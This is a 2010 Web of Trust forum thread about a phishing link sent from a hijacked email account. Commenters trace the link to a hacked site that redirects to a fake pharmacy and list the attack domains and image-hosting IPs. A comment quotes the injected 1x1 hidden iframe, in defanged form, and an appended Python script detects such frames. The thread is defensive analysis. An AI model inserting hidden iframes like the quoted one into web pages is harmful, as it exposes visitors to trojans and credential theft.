  1. tomgagaga on Mon 15 Mar 2010, 10:10:05 AM UTC

    MSN Phish becomes email hack.

    I would like to bring your attention to this website,

    hxxp://homag.co.uk/BlJdGPy001.html

    Apparently my colleague sent me this email with only this website as its content. When asked if she had wanted me to view the website, she said no, and did not know that this email had been sent.

    I thought the MSN Phish was only linked to sending offline instant messages. Have they grown to take control of the email account and send emails now instead?

    Phishing and/or other scams?

Comments:

  1. Kraftwerk on Mon 15 Mar 2010, 11:11:20 AM UTC

    Re:

    Have they grown to take control of the email account and send emails now instead?

    Well, if a mail was sent from this account, especially with such content, and the owner doesn't know anything, yes they've taken control of the email account.

    Did she change her password (and choose a good one)?
    Blueberrycake Level Member of the WOT Community

  2. chazsm on Mon 15 Mar 2010, 06:20:06 PM UTC

    Spoofing

    Sender address isn't hard.

  3. amishrabbit on Mon 15 Mar 2010, 08:21:57 PM UTC

    Frame redirect to "Canadian Healthcare" pill spammers

    Redirects to aquezetrs.com

  4. g7w on Tue 16 Mar 2010, 07:07:56 PM UTC

    re: homag.co.uk

    Site was hacked; many others suffer this same problem. For examples, check out Google.

    This site contains an iFrame

    <iframe border="0" src="hxxp://wowtribes.com/logs/index.php" frameborder="0" height="1" width="1">
    </iframe>

    wowtribes.com - scorecard - Attack Site
    Malicious content contains 178 Trojans
    Though the site is malicious, its purpose is to gather information from your browser, like a page/site counter.

    Other URIs that are loaded when visiting homag.co.uk/BlJdGPy001.html are:
    hxxp://hollywood-webcams.com/?id=2045-02&k=cbd1835f8&d=1]
    hollywood-webcams.com has no IP, it uses everydns.net to hide itself, re: robtex

    hxxp://aquezetrs.com/
    as pointed out, a fake online pharmacy Phishing for identity / credit card abuse.

    hxxp://58.22.229.135:8080/images/
    Loads various images displayed on the fake pharmacy site courtesy of china-netcom.com - CentralOps

    hxxp://208.91.44.4:8080/images/
    Loads various images for fake pharmacy, this one belongs to zilliontv.tv in California - CentralOps

    hxxp://69.169.164.46:8080/images/
    more image storage / retrieval, this one is a heating and cooling website hosted on broadweave.com - CentralOps

    hxxp://211.142.163.157:8080/images/
    again, image storage / retrieval courtesy of chinamobile.com - CentralOps

    hxxp://217.12.56.253:8080/images/
    ditto with image storage / retrieval, this is Railways of Slovakia at zsr.sk - CentralOps

    hxxp://203.114.105.231:8080/images/
    image storage / retrieval IP belongs to a Thai ISP at tot.co.th - CentralOps

    hxxp://208.68.172.22:8080/images/c
    more use for image storage; IP is assigned to: atlanticmetro.net hosted on dns-roots.net - CentralOps

    Malicious content = Trojans
    wowtribes.com

    Phishing site = Identity theft / Credit card abuse
    aquezetrs.com
    hollywood-webcams.com

    Redirects to known Phishing site: aquezetrs.com
    homag.co.uk

    Ethical issues = Used as an image storage / retrieval for known Phishing site networks.
    58.22.229.135
    208.91.44.4
    69.169.164.46
    211.142.163.157
    217.12.56.253
    203.114.105.231
    208.68.172.22

    Link to this thread in scorecard comments as reference.

    -------
    WOT Services Ltd. - gives us safety through Web of Trust.
    WOT Community - gives us security through unity.
    Thank you all
    - G7W
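
A site owner can check their own pages for the kind of injected frame quoted in the post above (a 1x1 iframe pointing at another host). The following is an added example, not part of the thread; the size threshold, the function names, and the sample page (including `video.example`) are assumptions constructed for illustration, and the quoted URL is kept defanged.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

MAX_PIXELS = 2  # assumption: frames this small in either dimension are invisible to the user
HIDING_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def _tiny(value):
    # True for a pixel dimension such as "1" or "1px" at or below MAX_PIXELS.
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= MAX_PIXELS

class HiddenFrameFinder(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        reasons = []
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("tiny dimensions")
        if HIDING_CSS.search(a.get("style", "")):
            reasons.append("hidden by CSS")
        # A relative src (no host) stays on the page's own site and is not reported.
        if reasons and host and host != self.page_host:
            self.findings.append((host, reasons))

def find_hidden_frames(html, page_host):
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    return finder.findings

# Constructed sample page; the first iframe is the one quoted in the post.
SAMPLE = """<html><body><p>Welcome</p>
<iframe border="0" src="hxxp://wowtribes.com/logs/index.php" frameborder="0" height="1" width="1">
</iframe>
<iframe src="/map.html" width="600" height="400"></iframe>
<iframe src="hxxp://video.example/embed" width="560" height="315"></iframe>
</body></html>"""

if __name__ == "__main__":
    for host, reasons in find_hidden_frames(SAMPLE, "homag.co.uk"):
        print(f"hidden external iframe -> {host} ({', '.join(reasons)})")
```

Only frames that are both visually hidden and served from a different host are reported, so the normally sized embed and the same-site frame in the sample are ignored.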